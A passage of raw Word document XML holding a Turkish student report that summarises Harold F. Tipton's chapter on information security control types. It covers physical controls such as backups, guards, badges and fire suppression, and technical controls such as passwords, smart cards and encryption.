          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>KAYNAKLAR……………………………………………………………………………………………14</w:t>
      </w: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0"/>
          <w:szCs w:val="20"/>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GİRİŞ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>Erişim Kontrolü Yönetimi bölümü olan 1.2 bölümünün Bilgi Güvenliği Kontrol Türleri ve Teknoloji ve Gizlilik Çatıştıdığında konuları olan ve bunlara ek olarak Gizli Dinleme (Eavesdropping) konusunu anlatacağım.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pP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BÖLÜM 1.2 ERİŞİM KONTROLÜ YÖNETİMİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>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BİLGİ GÜVENLİĞİ KONTROL TÜRLERİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Harold F. Tipton</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E"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ab/>
        <w:t>Güvenlik genellikle tehlikeden arınma veya emniyet koşulu olarak tanımlanır. Özellikle bilgisayar güvenliği, bir sistemdeki verilerin yetkisiz ifşa edilmesine, değiştirilmesine veya bilgisayar sisteminin kendisinin yetkisiz kullanıma, değiştirilmesine veya hizmet reddine karşı korunmasına karşı korunmasıdır. Bazı bilgisayar güvenlik kontrolleri üretkenliği engellediğinden, güvenlik tipik olarak güvenlik uygulayıcılarının, sistem kullanıcılarının ve sistem operasyonlarının ve idari personelin güvenlik ve verimlilik arasında tatmin edici bir denge sağlamak için çalıştığı bir uzlaşmadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E"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tr-TR"/>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u üç kontrol kategorisi ayrıca önleyici veya dedektif olarak sınıflandırılabilir. Önleyici kontroller istenmeyen olayların ortaya çıkmasını önlemeye çalışmakta, dedektif kontroller ise meydana geldikten sonra istenmeyen olayları tanımlamaya çalışmaktadır. Önleyici kontroller, bilgisayar kaynaklarının serbest kullanımını engeller ve bu nedenle yalnızca kullanıcıların kabul etmeye istekli olduğu dereceye uygulanabilir. Etkili güvenlik bilinci programları, kullanıcıların bu tür denetimlerin bilgisayar sistemlerine güvenmelerini nasıl sağladığını anlamalarına yardımcı olarak önleyici denetimlere karşı tolerans düzeyini artırmaya yardımcı olabilir. Yaygın dedektif denetimleri denetim izlerini, izinsiz giriş tespit yöntemlerini ve sağlama toplamlarını içer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iğer üç kontrol türü önleyici ve dedektif kontrolleri destekler. Genellikle caydırıcı, düzeltici ve kurtarma olarak tanımlanırlar. Caydırıcı kontroller, bireyleri bilişim güvenliği politikalarını veya prosedürlerini kasıtlı olarak ihlal etmekten caydırmak için tasarlanmıştır. Bunlar genellikle yetkisiz faaliyetleri veya sonuçların tehditlerini, güvenlik ihlalini engellemeyecek potansiyel bir davetsiz misafirin (örneğin utançtan ağır cezalara kadar değişen tehditler gibi) gerçekleştirmesini zorlaştırır veya istemez kılan kısıtlamalar biçimini al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üzeltici kontroller ya izinsiz faaliyete izin veren koşulları giderir ya da ihlallerden önce oldukları koşullara geri döner. Düzeltici kontrollerin uygulanması, mevcut fiziksel, teknik ve idari kontrollerde değişikliklere neden olabilir. Kurtarma denetimleri, kayıp bilgi işlem kaynaklarını veya yeteneklerini geri yükler ve kuruluşun güvenlik ihlallerinden kaynaklanan parasal kayıpları kurtarmasına yardımcı ol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Caydırıcı, düzeltici ve geri kazanım kontrolleri, fiziksel, teknik ve idari kontrollerin ana kategorileri içerisinde özel durumlar olarak kabul edilir; açıkça önleyici veya dedektif kategorilerine girmiyorlar. Örneğin, caydırıcılığın bir önleyici biçimi olduğu söylenebilir, çünkü bir davetsiz misafirin geri dönmesine neden olabilir; ancak caydırıcılık aynı zamanda davetsiz misafirin en çok korktuğu şey olan ihlalleri tespit etmeyi de içerir. Öte yandan, düzeltici kontroller önleyici ya da dedektif değildir, ancak antiviral yazılım bir virüsü yok ettiğinde teknik kontrollerle veya yedekleme prosedürleri zarar görmüş bir veri tabanını geri yüklemeyi sağladığında idari kontrollerle açıkça bağlantılıdır. Son olarak, kurtarma kontrolleri ne önleyici ne de dedektif değildir, ancak felaket kurtarma veya acil durum planları olarak idari kontrollere dahil ed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Fiziksel, teknik ve idari kontrollerle olan bu çakışmalardan dolayı caydırıcı, düzeltici ve kurtarma kontrolleri bu bölümde daha fazla ele alınmamaktadır. Bunun yerine, üç ana kategorideki önleyici ve dedektif kontroller incelenmişt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FİZİKSEL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Fiziksel güvenlik, bilgisayarlara, ilgili ekipmanlara (tesisler dahil) ve işleme tesisinin kendisine erişimi kontrol etmek için kilitlerin, güvenlik görevlilerinin, rozetlerin, alarmların ve benzeri önlemlerin kullanılmasıdır. Ek olarak, bilgisayarların, ilgili ekipmanların ve bunların içeriklerinin casusluk, hırsızlık ve imha veya kaza, yangın veya doğal afet (örneğin, ani ve depremler) kaynaklı hasarlardan korunma önlemleri alın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Önleyici Fiziksel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Yetkili olmayan personelin bilgi işlem olanaklarına girmesini engellemek (yani bilgisayar kaynaklarını barındıran yerler, yardımcı programları, bilgisayar basılı kopyalarını ve girdi veri ortamlarını) önlemek ve doğal afetlere karşı korunmaya yardımcı olmak için önleyici fiziksel kontroller kullanılır. Bu kontrollerin örnekleri arasında şunlar bulunu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Yedek dosyalar ve belgele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Parmaklıkla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üvenlik görevli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Rozet sistem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Çift kapı sistem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Kilitler ve anahtarla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Yedek güç.</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Biyometrik erişim kontrol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Yer seçim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İtfaiyeci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 xml:space="preserve">Yedekleme Dosyaları ve Belgeler: </w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Bir kaza veya davetsiz misafir aktif verileri veya belgeleri yok ederse, yedek kopyaların hazır bulunması önemlidir.</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Orijinalleri tahrip eden aynı olayın imhasını önlemek için yedekleme dosyaları aktif veri veya dokümantasyondan yeterince uzakta saklanmalıdır.</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Yedek malzeme, iki saatlik duvarlar dahil, yanmaz malzemelerden yapılmış güvenli bir yerde muhafaza edilmelidir.</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Hassas bilgilerin yedekleri, bu bilgilerin aktifleriyle aynı koruma seviyesine sahip olmalıdır; sistemdeki veriler için sıkı bir güvenlik sağlamak anlamsızdır, ancak aynı veriler için yedek bir yerde gevşek güvenlik sağ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Parmaklıklar:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Her ne kadar binanın etrafındaki çitler, belirli bir davetsiz misafire karşı çok fazla koruma sağlamamasına rağmen, resmi izinsiz giriş hattı kurarlar ve basitçe meraklı kişiyi caydırabilirler. Çitler alarm vermeli veya korumalar, köpekler veya TV monitörleri tarafından sürekli gözetim altında tutul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üvenlik Görevlileri:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Güvenlik görevlileri, davetsiz misafirleri engellemek ve yalnızca yetkili kişilerin girmesine izin verildiğinden emin olmak için çoğu kez tesislerin girişlerine yerleştirilir. Gardiyanlar, yalnızca yetkili, doğru şekilde tanımlanmış eşyaların tesise girip çıkmalarını sağlamak için paketlerin veya elden taşınan diğer eşyaların incelenmesinde etkilidir. Bina, güvenlik istasyonunda sonlanan alarmlar veya diğer uyarı göstergeli uygun elektronik dedektörlerle kablolandığında, sabit korumaların etkinliği büyük ölçüde artırılabilir. Ek olarak, gardiyanlar, izinsiz girişlerden izinsiz giriş yapmalarını engellemek için normal çalışma saatlerinden sonra binaların içindeki gözetimsiz alanları devriye gezmek için kullanıl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Rozet Sistemleri:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bilgi işlem alanlarına fiziksel erişim, bir rozet sistemi kullanılarak etkin bir şekilde kontrol edilebilir. Bu kontrol yöntemiyle çalışanlar ve ziyaretçiler erişim kontrolündeki her alanda uygun rozetleri giymelidir. Sadece yetkili kişilerin girişine izin vermek için programlanan rozet okuma sistemleri davetsiz misafirleri kolayca tespit ed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Çift Kapı Sistemleri:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Çift kapı sistemleri, insanları güvenli bölgeye bırakılmadan önce kendilerini korumaya tanıtmaya zorlamak için sınırlı alanlara (örneğin bilgisayar olanakları) girişlerde kullanılabilir. Çift kapılar, davetsiz misafirlerin izin verilen kişilerin arkasını takip etmelerini ve kısıtlı alanlara kaymalarını engellemenin mükemmel bir yolud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Kilitler ve Anahtarlar:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kilitler ve anahtarlar, sınırlı alanlara erişimi kontrol etmek için yaygın olarak kullanılır. Anahtarların kopyalanmasını kontrol etmek zor olduğundan, çoğu kurulum şifre kilitleri kullanır (yani, uygun sırayla basıldığında kilidi açan düğmeler içeren şifreli kilitler) kullanır. Şifre kilitleri ile, kombinasyondan ödün vermemek için hangi düğmelere basıldığına dikkat ed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Yedek Güç:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bilgisayar hizmetlerinin sürekli hazır olma durumunda olmalarını sağlamak ve normal güç kaybı durumunda ekipmana zarar gelmesini önlemek için yedek güç gerekir. Kısa süreli güç kaybı için, yedek güç genellikle piller tarafından sağlanır. 15-30 dakikadan daha uzun süren kesintilere duyarlı alanlarda genellikle dizel jeneratörler öner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lastRenderedPageBreak/>
        <w:t>Biyometrik Geçiş Kontrolleri:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Biyometrik tanımlama, bilgisayar tesislerine erişimi kontrol etmede rozet okuyuculardan daha karmaşık bir yöntemdir, ancak iki yöntem de aynı şekilde çalışır. Tanımlama için kullanılan biyometri, gerngerprints, handprints, ses düzenleri, imza örnekleri ve retina taramalarını içerir. Biyometri kaybedilme, çalınma veya paylaşılamadığından, rozetlerden daha yüksek bir güvenlik seviyesi sağlarlar. Yüksek güvenlikli, düşük trafikli giriş kontrolü için biyometrik tanımlama öner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Yer Seçimi:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bilgi işlem olanaklarına ev sahipliği yapan binanın bulunduğu alan, belirgin risklerden kaçınmak için dikkatlice seçilmelidir. Örneğin, ormanlık alanlar tehlike yaratabilir, bir deprem hatasının bitişiğindeki veya yanındaki alanlar tehlikeli olabilir ve bir ovada bulunan alanlar su hasarına karşı hassastır. Ek olarak, bir uçak yaklaşımı ya da kalkış rotası altındaki konumlar risklidir ve demiryolu raylarına bitişik konumlar ekipman sorunlarını çökertebilecek titreşimlere karşı hassas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b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>İtfaiyeciler:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Acil durumun kontrolü, acil durumun veri işlemeyi ciddi şekilde engelleyen bir felakete dönüşmesini önlemek için önemlidir. Bilgi işlem olanakları potansiyel kaynaklardan uzakta (örneğin mutfak veya kafeterya) bulunmalı ve yanıcı olmayan malzemelerden yapılmalıdır. Mobilyalar da yanmaz nitelikte olmalıdır. Kolay erişim için uygun yangın söndürücü tiplerinin uygun bir şekilde yerleştirilmesi önemlidir. Çalışanlar yangın söndürücülerinin uygun kullanımı ve patlak vermesi gereken prosedürler konusunda eğit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tab/>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Otomatik fıskiyeler bilgisayar odaları ve çevresindeki alanlarda ve yüksek zeminlerde pahalı ekipmanlar bulunduğunda çok önemlidir. Sprinkler, yanıcı malzemeler içeren herhangi bir bilgisayar odasının korunması için genellikle sigorta şirketleri tarafından belirlenir. Bununla birlikte, bilgisayar ekipmanında su hasarı riski genellikle damage hasar riskinden daha fazladır. Bu nedenle, karbon dioksit söndürme sistemleri geliştirilmiştir; bu sistemler, havadaki oksijeni gidererek baskı altına alan karbondioksit ile tehdit edilen bir bölgeye sahiptir. Her ne kadar karbondioksit suya zarar vermese de, bölgedeki insanlar için potansiyel olarak öldürücüdür ve şimdi yalnızca gözetimsiz alanlarda kullanılmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="708"/>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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>Mevcut yangın söndürme sistemleri, genellikle donanıma zarar vermeyen ve personel için karbondioksitten daha az tehlikeli olan Halon bölgesini aşmıştır. Yaklaşık% 10'luk bir konsantrasyonda, Halon yangın söndürür ve insanlar tarafından güvenli bir şekilde nefes alabilir. Bununla birlikte, daha yüksek konsantrasyonlar sonunda bir sağlık tehlikesi oluşturabilir. Ek olarak, Halon'u basınç altında serbest bırakmaktan kaynaklanan patlama, etraftaki gevşek nesneleri uçurabilir ve ekipman ve personel için tehlike oluşturabilir. Bu nedenlerden dolayı ve Halon'un yüksek maliyeti nedeniyle, genellikle bilgisayar odalarında yalnızca yüksek zeminlerde kullanılır. Kloro-ürokarbonlar içerdiğinden, yakında çevreye daha az zararlı olan bir gaz lehine geçecekt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Dedektif Fiziksel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dektif fiziksel kontroller, koruyucu hizmetler personelini, fiziksel güvenlik önlemlerinin ihlal edildiği konusunda uyarmaktadır. Bu kontrollerin örnekleri arasında şunlar bulun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Hareket detektör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Duman ve alev dedektör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Kapalı devre televizyon monitör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Sensörler ve alarm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Hareket Dedektörleri:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Genellikle içinde insan olmayan bilgisayar tesislerinde, hareket dedektörleri potansiyel izinsiz girişlere dikkat çekmek için kullanışlıdır. Hareket dedektörleri, korumalar tarafından sürekli izlen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Yangın ve Duman Dedektörleri:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yangın ve duman dedektörleri bir yangının erken uyarısını sağlamak için stratejik olarak yerleştirilmelidir. Tüm tespit ekipmanı çalışır durumda olduğundan emin olmak için periyodik olarak test ed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Kapalı Devre Televizyon Monitörleri:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kapalı devre televizyonlar, kullanıcıların veya operatörlerin sık sık bulunmadığı bilgi işlem alanlarındaki faaliyetleri izlemek için kullanılabilir. Bu yöntem, bireylerin şüpheli davrandıklarını tespit etmeye yardımcı ol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Sensörler ve Alarmlar:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sensörler ve alarmlar, hava ve soğutma suyu sıcaklıklarının ekipman tasarımı tarafından belirtilen seviyelerde kalmasını sağlamak için ekipmanı çevreleyen ortamı izler. Uygun koşullar sağlanmazsa, alarmlar bir iş kesintisi oluşmadan önce durumu düzeltmek için operasyonları ve bakım personelini çağırır.</w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>TEKNİK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Teknik güvenlik, bilgisayar donanımı, işlemler veya uygulama yazılımları, iletişim donanımı ve yazılımı ile ilgili cihazlarda bulunan güvenlik önlemlerinin kullanılmasını içerir. Teknik kontrollere bazen mantıksal kontroller denir.</w:t>
      </w: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Önleyici Teknik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Önleyici teknik kontroller, yetkisiz personel veya programların bilgi işlem kaynaklarına uzaktan erişimini engellemek için kullanılır. Bu kontrollerin örnekleri arasında şunlar bulun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Erişim kontrolü yazılımı.</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ntivirüs yazılımı.</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Kütüphane kontrol sistem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Şifrele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kıllı kartla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Şifreleme.</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Çevirmeli erişim kontrolü ve geri arama sistemler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Erişim Kontrol Yazılımı:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Geçiş kontrol yazılımının amacı, kullanıcılar arasında veri ve programların paylaşımını kontrol etmektir. Birçok bilgisayar sisteminde, verilere ve programlara erişim, hangi kullanıcıların erişime izin verildiğini belirleyen erişim kontrol listeleri tarafından uygulanır. Erişim kontrolü yazılımı, yalnızca yetkili oturum açma kimliği ve şifresi olan kayıtlı kullanıcıların bilgisayar sistemine erişim kazanabileceğini belirleyerek sisteme erişimi denetleme olanağı sağ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Sisteme erişim verildikten sonra, bir sonraki adım sistemde bulunan verilere ve programlara erişimi kontrol etmektir. Veri veya program sahibi, verileri veya programı kullanma yetkisi olan kişileri belirley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Antivirüs Yazılımı:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Virüsler, mikro bilgi işlem dünyasında salgın oranlara ulaşmış ve işlem yapılırken işlem bozulmalarına ve veri kaybına ve ayrıca temizlik sırasında önemli verimlilik kaybına neden olabilir. Buna ek olarak, sürekli artan bir oranda yeni virüsler ortaya çıkıyor - şu anda yaklaşık her 48 saatte bir. Virüsleri algılamak, tanımlamak, izole etmek ve ortadan kaldırmak için virüsten koruma yazılımının tüm mikro bilgisayarlara yüklenmesi önerilir. Yeni virüslere yardımcı olmak için bu yazılım sık sık güncellenmelidir. Ek olarak, virüslerin mümkün olduğunca erken ele geçirilmesine yardımcı olmak için, virüsten koruma yazılımı, kullanıcıların takdirine bağlı olarak aralıklı olarak kullanılmayan bir sistemde etkin tutul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Kütüphane Kontrol Sistemleri:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bu sistemler, üretim programlarındaki tüm değişikliklerin, değişiklikleri oluşturan programcılar yerine kütüphane kontrol personeli tarafından yapılmasını gerektirir. Bu uygulama, üretim programlarında yetkisiz değişiklik yapılmasını önleyen görevlerin ayrılmasını sağ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Şifreler:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Parolalar, bir kimliğin kullanıcısının kimliğin sahibi olduğunu doğrulamak için kullanılır. Kimlik şifresi kombinasyonu, her kullanıcı için benzersizdir ve bu nedenle, kullanıcıların sistemdeki etkinliklerinden sorumlu olmalarını sağ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elirli bir süre için kullanılan sabit şifreler, bilgisayar korsanlarının ödün vermesi için genellikle kolaydır; bu nedenle, bu şifrelerin herhangi bir sözlükte görünmemesi için büyük özen gösterilmelidir. Sabit şifreler genellikle belirli veri tabanlarına erişimi kontrol etmek için kullanılır. Bununla birlikte, bu kullanımda, veri tabanına erişim yetkisi olan herkes aynı şifreyi kullanır; bu nedenle sorumluluk alınamaz.</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Günümüzde, her oturum açma için farklı olan dinamik veya bir defalık şifreler şifreli şifrelere göre tercih edilmektedir. Dinamik şifreler, rasgele şifreler oluşturmak için programlanmış bir belirteç tarafından oluşturulu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Akıllı Kartlar:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Akıllı kartlar genellikle bir kredi kartının boyutuyla ilgilidir ve belirli bir kullanıcının ayrıcalıklarını tanımlamak için uzak bir terminalde okunabilen mantık fonksiyonları ve bilgileri olan bir çip içerir. Akıllı kartlar artık, bilgisayara veya ağa erişim yetkisini doğrulamak için kullanıcının sağladığı verilerle (örneğin kişisel bir kimlik numarası veya biyometrik veriler) karşılaştırılan önceden kaydedilmiş, genellikle şifreli erişim denetimi bilgilerini taş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Şifreleme:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Şifreleme, düz metinlerin (yani okunabilir veriler) şifreli tekniklerle şifreli metinlere (yani okunamaz veriler) dönüşümü olarak tanımlanır. Şifreleme, verileri ağ iletimleri sırasında ifşa edilmekten korumanın tek kesin yolu olarak kabul edilmekte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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>Şifreleme donanım veya yazılım ile uygulanabilir. Yazılım tabanlı şifreleme en ucuz yöntemdir ve düşük hacimli yayınlar içeren uygulamalar için uygundur; Yazılımın büyük miktarda veri için kullanılması, işlem maliyetlerinde kabul edilemez bir artışa neden olur. Donanım şifrelemeyle ilgili hiçbir ek yük olmadığı için, büyük miktarlarda veri söz konusu olduğunda bu yöntem tercih ed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Çevirmeli Erişim Kontrolü ve Geri Arama Sistemleri:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
